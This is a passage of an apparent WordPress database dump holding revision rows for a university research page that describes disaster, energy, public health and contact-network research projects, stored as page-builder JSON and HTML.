5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"Orpheus\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, which reflects our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2023-09-29 10:36:20','2023-09-29 14:36:20','',438,'https://gsudice.dataconn.net/?p=1461',0,'revision','',0),(1462,1,'2023-09-29 10:36:20','2023-09-29 14:36:20','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-389 style-local-126-c33 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-390-outer style-local-126-c34-outer\">\n <div data-colibri-id=\"126-c34\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-390 style-local-126-c34 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-391-outer style-local-126-c35-outer\">\n <div data-colibri-id=\"126-c35\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-391 style-local-126-c35 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c36\" class=\"h-global-transition-all h-heading style-392 style-local-126-c36 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-392 style-local-126-c36\">\n <!---->\n <!---->\n <h5 class=\"\">Urban Scale Energy Assessments</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c37\" class=\"h-text h-text-component style-394 style-local-126-c37 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities\n in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment\n of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption\n patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and\n propose a plan for grid distribution optimized for human-centric usage and need.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c14\" id=\"about-3\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-353 style-local-126-c14 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-354 style-local-126-c15 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-355-outer style-local-126-c16-outer\">\n <div data-colibri-id=\"126-c16\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-355 style-local-126-c16 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c17\" class=\"h-global-transition-all h-heading style-356 style-local-126-c17 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-356 style-local-126-c17\">\n <!---->\n <!---->\n <h5 class=\"\">Understanding Disaster Impacts using the NOAA Storm Events Database</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c18\" class=\"h-text h-text-component style-358 style-local-126-c18 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned\n documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative/s have the potential\n of containing crucial information about the episodes/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This\n two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-359-outer style-local-126-c19-outer\">\n <div data-colibri-id=\"126-c19\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-359 style-local-126-c19 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c20\" id=\"about-4\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-360 style-local-126-c20 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c21\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-361 style-local-126-c21 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-362-outer style-local-126-c22-outer\">\n <div data-colibri-id=\"126-c22\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-362 style-local-126-c22 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-363-outer style-local-126-c23-outer\">\n <div data-colibri-id=\"126-c23\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-363 style-local-126-c23 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c24\" class=\"h-global-transition-all h-heading style-364 style-local-126-c24 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-364 style-local-126-c24\">\n <!---->\n <!---->\n <h5 class=\"\">The DICE Data Repository </h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c25\" class=\"h-text h-text-component style-366 style-local-126-c25 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment\n of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed\n ontology will define semantics associated with adverse events & corresponding response and recovery efforts. \n <br>\n </p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c26\" id=\"about-5\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-381 style-local-126-c26 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c27\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-382 style-local-126-c27 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-383-outer style-local-126-c28-outer\">\n <div data-colibri-id=\"126-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-383 style-local-126-c28 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c29\" class=\"h-global-transition-all h-heading style-384 style-local-126-c29 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-384 style-local-126-c29\">\n <!---->\n <!---->\n <h5 class=\"\">Orpheus</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c30\" class=\"h-text h-text-component style-386 style-local-126-c30 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of\n the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that\n can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-387-outer style-local-126-c31-outer\">\n <div data-colibri-id=\"126-c31\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-387 style-local-126-c31 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c8\" id=\"about-2\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-346 style-local-126-c8 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c9\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-347 style-local-126-c9 position-relative\">\n <!---->\n <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n <!---->\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-348-outer style-local-126-c10-outer\">\n <div data-colibri-id=\"126-c10\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-348 style-local-126-c10 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n <!---->\n </div>\n </div>\n </div>\n <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-349-outer style-local-126-c11-outer\">\n <div data-colibri-id=\"126-c11\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-349 style-local-126-c11 position-relative\">\n <!---->\n <!---->\n <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n <!---->\n <div data-colibri-id=\"126-c12\" class=\"h-global-transition-all h-heading style-350 style-local-126-c12 position-relative h-element\">\n <!---->\n <div class=\"h-heading__outer style-350 style-local-126-c12\">\n <!---->\n <!---->\n <h5 class=\"\">GSU Contact Network Prediction</h5>\n </div>\n </div>\n <div data-colibri-id=\"126-c13\" class=\"h-text h-text-component style-352 style-local-126-c13 position-relative h-element\">\n <!---->\n <!---->\n <div class=\"\">\n <p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion/goat/snake fire-breathing creature, which reflects our approach to this\n research. We are using an ensemble of simulation types/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible\n to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to\n account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts\n to reduce the number of “scheduled” contacts a GSU student makes throughout the day.</p>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n </div>\n</div>','Research','','inherit','closed','closed','','126-revision-v1','','','2023-09-29 10:36:20','2023-09-29 14:36:20','',126,'https://gsudice.dataconn.net/?p=1462',0,'revision','',0),(1468,1,'2023-09-29 10:37:07','2023-09-29 14:37:07','{\"name\":\"hop-content\",\"children\":[{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 6\",\"attrs\":{\"id\":\"about-6\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c34\",\"parentId\":\"126-c33\",\"partialId\":126,\"styleRef\":390,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c35\",\"parentId\":\"126-c33\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c35\",\"index\":0,\"id\":\"126-c36\",\"partialId\":126,\"styleRef\":392,\"type\":\"content\",\"props\":{\"content\":\"Urban Scale Energy Assessments\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c35\",\"index\":2,\"id\":\"126-c37\",\"partialId\":126,\"styleRef\":394,\"type\":\"content\",\"props\":{\"content\":\"<p>Often old and outdated, frequently, urban electric grids in America are at odds with residential and commercial usage requirements. Recent weather events, such as the 2021 winter storm in Texas, have exposed serious vulnerabilities in the resilience of the electric infrastructure to support unprecedented surges in electricity demand. The growing threat of such events with climate change and the migration of populations into urban centers requires a reassessment of energy consumption patterns in most US cities. While both private providers and state regulatory bodies have detailed information on energy consumption patterns, there is a need to develop computational models to predict consumption patterns during extreme weather events, including winter storms and heatwaves. This research uses 3D models of commercial and residential buildings to create a gradient of energy usage with the granularity of a single building and propose a plan for grid distribution optimized for human-centric usage and need.<\\/p>\"}}],\"styleRef\":391,\"type\":\"content\"}],\"id\":\"126-c33\",\"parentId\":\"126-c32\",\"partialId\":126,\"styleRef\":389,\"type\":\"content\"}],\"id\":\"126-c32\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":388,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 3\",\"attrs\":{\"id\":\"about-3\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c16\",\"parentId\":\"126-c15\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c16\",\"index\":0,\"id\":\"126-c17\",\"partialId\":126,\"styleRef\":356,\"type\":\"content\",\"props\":{\"content\":\"Understanding Disaster Impacts using the NOAA Storm Events Database<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c16\",\"index\":2,\"id\":\"126-c18\",\"partialId\":126,\"styleRef\":358,\"type\":\"content\",\"props\":{\"content\":\"<p>The National Oceanic and Atmospheric Administration (NOAA) has an up-to-date database of Storm Events in the US beginning January 1950. The storm events before 1995 require Optical Character Recognition to extract data from scanned documents. Some extraction has been done already, but not for every storm event. Records starting in 1996 are already in plain text. For almost all records, there are natural language narratives, and these narrative\\/s have the potential of containing crucial information about the episodes\\/events. If these narratives were in a more structured format, they could potentially yield a better understanding of destruction patterns and possible focuses for resilience. This two-part project is utilizing modern Optical Character Recognition, Information Retrieval, Deep Learning, and Natural Language Processing Tools in order to data-mine and extract information from these storm event records.<\\/p>\"}}],\"styleRef\":355,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":\"30\",\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c19\",\"parentId\":\"126-c15\",\"partialId\":126,\"styleRef\":359,\"type\":\"content\"}],\"id\":\"126-c15\",\"parentId\":\"126-c14\",\"partialId\":126,\"styleRef\":354,\"type\":\"content\"}],\"id\":\"126-c14\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":353,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 4\",\"attrs\":{\"id\":\"about-4\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c22\",\"parentId\":\"126-c21\",\"partialId\":126,\"styleRef\":362,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c23\",\"parentId\":\"126-c21\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c23\",\"index\":0,\"id\":\"126-c24\",\"partialId\":126,\"styleRef\":364,\"type\":\"content\",\"props\":{\"content\":\"The DICE Data Repository <br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c23\",\"index\":2,\"id\":\"126-c25\",\"partialId\":126,\"styleRef\":366,\"type\":\"content\",\"props\":{\"content\":\"<p>The DICE data repository aims to be a data clearinghouse for spatially-indexed datasets on disease and disaster outcomes, population indicators of vulnerability, hazard and disaster events, and other variables related to the assessment of population risk and resilience to hazards and disasters. In addition to a large database that is accessible via published APIs, DICE researchers are developing an ontology-based framework for hazards and disasters. The proposed ontology will define semantics associated with adverse events & corresponding response and recovery efforts. <br><\\/p>\"}}],\"styleRef\":363,\"type\":\"content\"}],\"id\":\"126-c21\",\"parentId\":\"126-c20\",\"partialId\":126,\"styleRef\":361,\"type\":\"content\"}],\"id\":\"126-c20\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":360,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 5\",\"attrs\":{\"id\":\"about-5\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c28\",\"parentId\":\"126-c27\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c28\",\"index\":0,\"id\":\"126-c29\",\"partialId\":126,\"styleRef\":384,\"type\":\"content\",\"props\":{\"content\":\"Orpheus\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c28\",\"index\":2,\"id\":\"126-c30\",\"partialId\":126,\"styleRef\":386,\"type\":\"content\",\"props\":{\"content\":\"<p>Operational Readiness for Public Health Emergencies in the U.S. (ORPHEUS) is a decision support framework that shall enable public health practitioners and responders to guide individuals, groups, communities, and populations out of the chaos brought upon a geographic region by natural or human-made disasters. Upon prioritizing regional hazards, planning authorities will determine specific mitigation strategies for those hazards. While data-driven tools that can aid regional hazard prioritization have been developed in recent years, we witness a distinct lack of such data-driven tools that facilitate the design of effective response plans capable of addressing specific hazards.<\\/p>\"}}],\"styleRef\":383,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c31\",\"parentId\":\"126-c27\",\"partialId\":126,\"styleRef\":387,\"type\":\"content\"}],\"id\":\"126-c27\",\"parentId\":\"126-c26\",\"partialId\":126,\"styleRef\":382,\"type\":\"content\"}],\"id\":\"126-c26\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":381,\"type\":\"content\"},{\"name\":\"hop-section\",\"props\":{\"anchor\":false,\"name\":\"About 2\",\"attrs\":{\"id\":\"about-2\"}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"unit\":\"%\",\"value\":\"90\"}}}}}}},\"id\":\"126-c10\",\"parentId\":\"126-c9\",\"partialId\":126,\"styleRef\":348,\"type\":\"content\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}}}}},\"id\":\"126-c11\",\"parentId\":\"126-c9\",\"partialId\":126,\"children\":[{\"name\":\"hop-heading\",\"parentId\":\"126-c11\",\"index\":0,\"id\":\"126-c12\",\"partialId\":126,\"styleRef\":350,\"type\":\"content\",\"props\":{\"content\":\"GSU Contact Network Prediction<br>\"}},{\"name\":\"hop-text\",\"parentId\":\"126-c11\",\"index\":2,\"id\":\"126-c13\",\"partialId\":126,\"styleRef\":352,\"type\":\"content\",\"props\":{\"content\":\"<p>The name of this project, chimera, has two meanings, which metaphorically fit well with our project. First, a chimera is a Greek mythological, hybrid lion\\/goat\\/snake fire-breathing creature, which reflects our approach to this research. We are using an ensemble of simulation types\\/models to create a picture of scheduled contacts that a GSU student may make on a given day in the school semester. Another meaning for chimera is a thing that is impossible to achieve, and this is also critical to the project; No matter how close we try to simulate reality, the model will never achieve anywhere close to perfection. To combat this impossibility, we work to develop abstract methods to account for this implicit imperfection to get as close as we can without flying too close to the sun. In our research for Project Chimera, we endeavor to create an ensemble simulation model to ultimately allow us to simulate efforts to reduce the number of \\u201cscheduled\\u201d contacts a GSU student makes throughout the day.<\\/p>\"}}],\"styleRef\":349,\"type\":\"content\"}],\"id\":\"126-c9\",\"parentId\":\"126-c8\",\"partialId\":126,\"styleRef\":347,\"type\":\"content\"}],\"id\":\"126-c8\",\"parentId\":\"126-c1\",\"partialId\":126,\"styleRef\":346,\"type\":\"content\"}],\"id\":\"126-c1\",\"partialId\":126,\"styleRef\":338,\"type\":\"content\"}','','','inherit','closed','closed','','438-revision-v1','','','2023-09-29 10:37:07','2023-09-29 14:37:07','',438,'https://gsudice.dataconn.net/?p=1468',0,'revision','',0),(1469,1,'2023-09-29 10:37:07','2023-09-29 14:37:07','<div data-colibri-id=\"126-c1\" class=\"style-338 style-local-126-c1 position-relative\">\n <!---->\n <div data-colibri-component=\"section\" data-colibri-id=\"126-c32\" id=\"about-6\" class=\"h-section h-section-global-spacing d-flex align-items-lg-center align-items-md-center align-items-center style-388 style-local-126-c32 position-relative\">\n <!---->\n <!---->\n <div class=\"h-section-grid-container h-section-fluid-container\">\n <!---->\n <div data-colibri-id=\"126-c33\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 